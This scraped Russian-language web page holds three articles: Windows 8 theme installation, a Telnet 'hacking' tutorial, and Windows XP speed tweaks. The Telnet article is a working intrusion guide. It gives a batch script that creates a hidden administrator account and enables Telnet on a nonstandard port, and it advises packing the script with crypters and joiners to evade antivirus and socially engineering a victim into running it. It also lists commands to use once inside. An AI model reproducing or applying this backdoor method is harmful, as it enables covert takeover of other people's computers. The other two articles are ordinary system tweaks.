<h1>КАК УСТАНОВИТЬ ТЕМЫ ДЛЯ WINDOWS 8</h1>
Ales — Mon, 18 Feb 2013 09:01:07 GMT
Установка новой темы оформления для Windows 8 почти не отличается как это было на семерке. 1. Скачиваем любой архив из раздела - темы для Windows 8. 2. Устанавливаем патч для сторонних тем - UltraUXThemePatcher, и перезагружаем компьютер. 3. Извлекаем архив и копируем файлы темы в директорию "C:\WIndows\Resources\Themes\", это действие нужно сделать правильно, иначе у Вас тема не будет работать. Внимательно посмотрите рисунок ниже. <div align="center"><a href="http://icsez.tk/_fr/0/7267938.jpg" class="ulightbox" target="_blank" title="Нажмите, для просмотра в полном размере..."></a></div> Если все сделано правильно, то тема отобразится в панели персонализации, где ее вы уже можите применить. В некоторых случаях для соответствия со скриншотом приходится заменять системные файлы. Как это сделать? 1. Получаем права доступа к файлу с помощью утилиты - TakeOwnershipEx для Win8. (Пример в этой статье) 2. После чего можно заменять системный файл, мы возьмем за пример ExplorerFrame.dll. Ищем его в папке "C:\Windows\System32", и переименовываем в к примеру ExplorerFrame.dlloriginal, после в ту же папку копируем новый ExplorerFrame.dll, и перезагружаем проводник или компьютер. <div align="center">UltraUXThemePatcher TakeOwnershipEx Прикреплены</div>
</article>
<article>
<h1>Telnet</h1>
zloi_volk — Tue, 08 Mar 2011 21:56:18 GMT
Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет. <div class="uSpoilerClosed" id="uSpoilerX6TSiI"><div class="uSpoilerButBl"><input type="button" class="uSpoilerButton" onclick="if($('#uSpoilerX6TSiI')[0]){if ($('.uSpoilerText',$('#uSpoilerX6TSiI'))[0].style.display=='none'){$('.uSpoilerText',$('#uSpoilerX6TSiI'))[0].style.display='';$('.uSpoilerButton',$('#uSpoilerX6TSiI')).val('[\–] Читать');$('#uSpoilerX6TSiI').attr('class','uSpoilerOpened');}else {$('.uSpoilerText',$('#uSpoilerX6TSiI'))[0].style.display='none';$('.uSpoilerButton',$('#uSpoilerX6TSiI')).val('[+] Читать');$('#uSpoilerX6TSiI').attr('class','uSpoilerClosed');}}" value="[+] Читать"/></div><div class="uSpoilerText" style="display:none;"><div class="bbCodeBlock"><div class="bbCodeName" style="padding-left:5px;font-weight:bold;font-size:7pt">Code</div><div class="codeMessage" style="border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight<5?this.style.height:scrollHeight>200?'200px':''+(this.scrollHeight+5)+'px');">Телнет - сетевой протокол для работы в удаленной системе в терминальном   режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал, позволяющая нам подключаться к удаленным компьютерам. Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у   жертвы. Бывает такое, что этот сервис уже будет весить у "врага", но при попытки   подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,   но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким   методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.   Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот   метод в данном случае наиболее актуален.   Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый   тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе   порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто   написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной строки). тело батника: chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet все это пишешь в блокноте, и сохраняем как *.bat Теперь пояснения: chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке. net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную   первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server. net user hacker hack /add и net localgroup Администраторы hacker /add - не трудно догадаться, что этими   командами создаётся новая учетная запись с админскими правами,   где логин: hacker пасс: hack Так как при создании нового админа он будет виден в welcome screen'е, отключить его   можно импортировав рег файл в реестр, следующего содержания: Содержимое conf.re Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows   NTCurrentVersionWinlogonSpecialAccountsUserLis t] "hacker"=dword:00000000 Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=   auto которая меняет тип его запуска на автоматический(по дефолту disabled ). При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это   палевно, поэтому советую прописывать этой командой tlntadmn config port=972   sec=-NTLM , редко используемый порт. В нашем случае это 972. Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet   окончательно запустит наш бэкдор. теперь проверим правильный ли синтаксис кода. Открываем командную строку, если   она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,   запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:   Пуск -> Выполнить -> пишем services.msc -> Ok   Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и   смотришь её свойства. При необходимости в любой момент можно её отключить. Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает   консольное черное окно, говорящее о выполняемых процессах в командной строке. Но   не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://ifolder.ru/7197807. Она   компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник   превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.   Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому   бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно   скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872   RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить   сигнатуру дабы не палится антивирусами.   Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы   тебе осталось только подключится к телнету через указанный тобой порт. Бывает   так что жертва находится в глобальной сети www у которой IP динамический, в этом   случаи, зная диапазон IP его провайдера можно просканировать эту сеть на   открытый наш редко используемый 972 Порт. А чтобы знать когда твой "друг"   в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент. Осталось подключится. Для этого можешь выбрать стандартный виндосовский   клиент который находится тут c:WINDOWSsystem32telnet.exe.   Запускаешь. Пишешь: Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт] если пишет: Welcome to Microsoft Telnet Service login:_ то всё акей =)) Вводишь: login: hacker password: hack Появляется надпись: *================================================= ==== Вас приветствует Telnet-сервер производства корпорации Майкрософт *================================================= ==== C:>_ Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь   управлять кампом, отдавая команды... Можно к примеру расшарить диски: C:>net share disk_c=c: > nul C:>net share disk_d=d: > nul C:>net share disk_e=e: > nul перезагрузить комп: C:>shutdown -r -t 1 -c -f прописать какой-нибудь ключ реестра: C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v   DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему или поднять ftp сервер и залить радмина для более удобного удаленного   администрирования: C:>ftp   В общем-то, здесь уже играет фантазия взломщика =) Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.</div></div> </div></div>P.S. На все непонятные термины и выражения есть Гугл. Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей информационной безопасности Источник- <a class="link" href="fssr.ru" rel="nofollow" target="_blank">fssr.ru</a>
</article>
<article>
<h1>25 советов как ускорить Windows XP</h1>
zloi_volk — Tue, 08 Mar 2011 21:38:55 GMT
<div align="center">25 советов как ускорить Windows XP</div> Цель нижеописанных советов избавить установленную Windows XP Pro Russian от совершенно ненужных для домашнего пользователя украшательств и ускорить в целом работу системы. Эти 25 советов, только часть того, что можно сделать по оптимизации и ускорению Windows XP.Перед применением лучше сделать резервную копию. 1.Возвращаем классический стиль меню "Пуск". Щелкаем правой кнопкой мыши по таскбару , "Свойства", вкладка "Меню "Пуск", выбираем "Классическое меню "Пуск", жмем "ОК". 2. Убираем эффекты оформления. Щелчок правой кнопкой мыши по пустому месту экрана, пункт меню "Свойства", вкладка "Оформление". Выбираем "Классический стиль" окон и кнопок. Нажимаем кнопку "Эффекты". Снимаем все галки, кроме последней. 3.Включаем отображение скрытых и ситстемных файлов и папок. В "Панели управления" выбираем "Свойства папки". В открывшемся окне выбираем "Использовать обычные папки "Windows" - это избавит нас от лишних украшательств, которые замедляют процесс навигации. Переходим во вкладку "Вид". Ставим галочку в пункте "Не кэшировать эскизы" - иначе при просмотре папок с графическими файлами Windows будет замусоривать ее миниатюрными копиями картинок, галочка в пункте "Отображать "Панель управления" в папке "Мой компьютер"; убираем галочки в пунктах "Помнить параметры отображения каждой папки" (опционально) и "Скрывать защищенные системные файлы"; выбираем опцию "Показывать скрытые файлы и папки". 4. Убираем визуальные эффекты. В "Панели управления" выбираем "Система". Во вкладке "Дополнительно" в рамке "Быстродействие" щелкаем на кнопку "Параметры". В открывшемся окне выбираем пункт "Визуальные эффекты" и убираем все галочки. 5.Отключаем отчеты об ошибках. Вызываем "Свойства системы" и на вкладке "Дополнительно" - "Отчет об ошибках", выбираем "Отключить отчет об ошибках". 6.Удаляем Windows Messenger. Каждый раз при загрузке системы Messenger тоже стартует, замедляет при этом процесс загрузки, пожирает системные ресурсы. В командной строке Пуск - "Выполнить" напечатать следующее: «RunDll32 advpack.dll,LaunchINFSection %windir%INFmsmsgs.inf,BLC.Remove» и нажать «OK». После перезагрузки Windows Messenger у себя на компьютере вы больше не найдете. 7.Устанавливаем оптимальное значение файла подкачки. "Свойства системы" - "Дополнительно" - "Быстродействие" - "Дополнительно" -"Виртуальная память" - "Изменить". Исходный размер и максимальный рекомендуется ставить одинаковым. Для обычной работы достаточно имеющийся объем памяти умножить на 1,5. Для игр памяти требуется в два, два с половиной раза больше. 8. Уменьшаем время задержки перед раскрытием вложенных меню. Пуск - "Выполнить" напечатать "regedit". В реестре находим HKEY_CURRENT_USERControl PanelDesktop. Параметр MenuShowDelay меняем с 400 до 0. 9. Удаляем ненужные программы из автозагрузки. Пуск - "Выполнить" набираем "msconfig". Вкладка "Автозагрузка" - снимите галочки около тех программ, которые вам не нужны. 10. Очищаем папку "prefetch" - C:windowsprefetch. В этой папке находятся ссылки на запускаемые приложения и программы. Часть ссылок уже не используется или используется редко, но при загрузке система проверяет наличие ссылок в этой папке. Со временем количество ссылок в этой папки увеличивается на столько, что системе требуется больше времени на проверку. Очистка этой папки ускорит быстродействие вашей системы. Не рекомендуется после очистки папки делать перезагрузку системы. Это ухудшит быстродействие. 11. Отключаем индексирование. Открываете «Мой компьютер», кликнете правой клавишей мыши на иконке жесткого диска и выбираете «Свойства». В открывшемся окне снимаете галочку «Разрешить индексирование диска для быстрого поиска». После нажатия кнопок «Применить» или «ОК» появится новое окно, в котором вам будет задан вопрос, применить ли выбранные атрибуты только к текущему диску или и к вложенным файлам и папкам тоже. В результате система будет работать немного быстрей. Применимо только для дисков с файловой системой NTFS. 12. Файлы архивов не пердставляют собой папки. Windows XP считает файлы "Zip" папками — это удобно, если у вас быстрый компьютер. На более медленных системах можно заставить Windows ХР отказаться от этой возможности(если у вас есть другой архиватор, например "RAR"), набрав в командной строке "regsvr32 /u zipfldr.dll". Все вернуть назад можно командой "regsvr32 zipfldr.dll". 13. Изменяем приоритет запросов на прерывание (IRQ). Если увеличить приоритет CMOS-памяти и часов реального времени, то можно увеличить производительность всех элементов системной платы. Открыть "Свойства системы" - "Оборудование" кнопка "Диспетчер устройств". Теперь откройте свойства интересующего вас устройства, и выберите закладку "Ресурсы". Здесь вы можете увидеть, какой номер IRQ используется выбранным устройством. Запомните номер прерывания и закройте все окна. Запустите RegEdit . Найдите раздел HKEY_LOCAL_MACHINE/System/CurrentControl Set/Control/PriorityControl. Создайте новый DWORD ключ IRQ#Priority (где '#' номер IRQ) и установите его в «1». Например, в нашем случае IRQ08 зарезервирован под System CMOS. Поэтому мы создали ключ IRQ8Priority. 14.Отключение не используемой подсистемы "POSIX" может несколько увеличить скорость работы. Запускаем "Regedit". Откройте в редакторе реестра ветку HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl SessionManagerSubSystems и удалите строки Optional и Posix. 15. Не производить запись последнего доступа к файлам (только NTFS). Ускоряет доступ к каталогам с большим количеством файлов. В редакторе реестра "Regedit" HKLMSYSTEMCurrentControlSetControlFileSystem параметр NtfsDisableLastAccessUpdate, значение "1" 16. Не использовать файл подкачки для хранения ядра системы. По умолчанию WinXP выгружает ядро и системные драйвера в файл подкачки, если они не используются. С помощью данной опции можно указать WinXP хранить ядро и системные драйвера всегда в памяти. Запускаем "Regedit" HKLMSYSTEMCurrentControlSetControlSession ManagerMemory Management параметр DisablePagingExecutive, "1" - не использовать файл подкачки для хранения ядра системы, "0" - использовать 17. Автоматически выгружать не используемые библиотеки. Эта функция поможет освободить память. Запускаем "Regedit" HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorer параметр AlwaysUnloadDLL, значение "1" - выгружать библиотеки, значение "0" - не выгружать. значение 1 - выгружать библиотеки, значение 0 - не выгружать значение 1 - выгружать библиотеки, значение 0 - не выгружать. Примечание: возможна нестабильная работа системы при включенной опции. 18. Использовать быстрое переключение пользователей. Если опция включена, то при переключении на другого пользователя, программы текущего пользователя будут продолжать работать. Иначе, программы будут автоматически выключатся, когда пользователь выходит из системы, и со следующим пользователем компьютер будет работать быстрее. Запускаем "Regedit" HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon параметр AllowMultipleTSSessions, значение "1" - использовать быстрое переключение пользователей 19. Отключить встроенный отладчик Dr. Watson. Если опция выключена, то при ошибке в программе, будет выводиться соответствующее сообщение об ошибке с кнопками ОК и Отмена, при нажатии ОК - приложение завершается, а при нажатии на отмену запускается отладчик. В редакторе реестра "Regedit" HKLMSOFTWAREMicrosoftWindows NTCurrentVersionAeDebug параметр "Auto" выставляем "0" 20. Не вести историю открытия документов. Не вести историю "Недавно использовавшихся документов". Windows XP создает в папке Documents and Settings%USERNAME%Recent ярлыки к запускаемым программам. Вы можете отключить данную возможность, если не пользуетесь ими. Запускаем "Regedit" HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer параметр NoRecentDocsHistory, значение "1"-история не ведется 21. Автоматически завершать зависшие приложения. Эта опция используется для автоматического закрытия без всякого предупреждения всех зависших программ. Удобно при завершении работы компьютера, если приложение не отвечает, то не надо нажимать на кнопку, чтобы его завершить. Запускаем "Regedit" HKCUControl PanelDesktop параметр AutoEndTasks, значение "1" - автоматически завершать зависшие приложения, "0" - ждать ввода пользователя 22. Отключить сообщение о недостатке свободного места на диске. Не выдавать сообщение о недостатке места на диске. Имеет смысл использовать данную опцию на дисках малого размера. Запускаем "Regedit" HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer параметр, NoLowDiskSpaceChecks, значение "1" - сообщение отключено, "0" - включено 23. Блокировка автоматического обновления в Windows Media Player. Windows Media Player периодически устанавливает связь через интернет для проверки существования новой версии программы (Tools-Options-рамка Automatic updates). Можно отключить данную возможность в Windows Media Player. Запускаем "Regedit" HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows MediaPlayer параметр DisableAutoUpdate, значение "1". 24. Освобождение канала (bandwidth), зарезервированного за сервисом QoS. Windows XP по умолчанию выделяет часть интернет-канала для Quality of Service (QoS). Назначение QoS — улучшать распределение трафика программ, написанных с учетом QoS API. Этих программ не найдешь, поэтому резервирование канала под ненужный сервис — непозволительная роскошь. Для того, чтобы освободить и без того узкий канал отечественного соединения с Интернетом, в меню Пуск -> Выполнить запустите редактор групповых политик gpedit.msc. Для выполнения вам необходимо быть администратором системы. 25.В разделе "Конфигурация компьютера" выберите пункт "Административные шаблоны", далее "Сеть" и затем в правой панели выберите «Диспетчер пакетов QoS» и кликните на нем два раза. Выберите опцию "Ограничить резервируемую пропускную способность" и опять-таки кликните на ней два раза. В открывшемся окне включите Enabled, а затем укажите лимит канала в процентах равный нулю, нажмите "ОК" и выйдите из программы. Откройте "Сетевые подключения" на "Панели управления" откройте свойства вашего подключения и на закладке "Сеть" убедитесь, что протокол "Планировщик пакетов QoS" подключен. Если его там нет, то добавьте из списка и перезагрузите компьютер. Источник: <a class="link" href="http://duralei2.livejournal.com" rel="nofollow" target="_blank">http://duralei2.livejournal.com</a>
</article>
</main></body></html>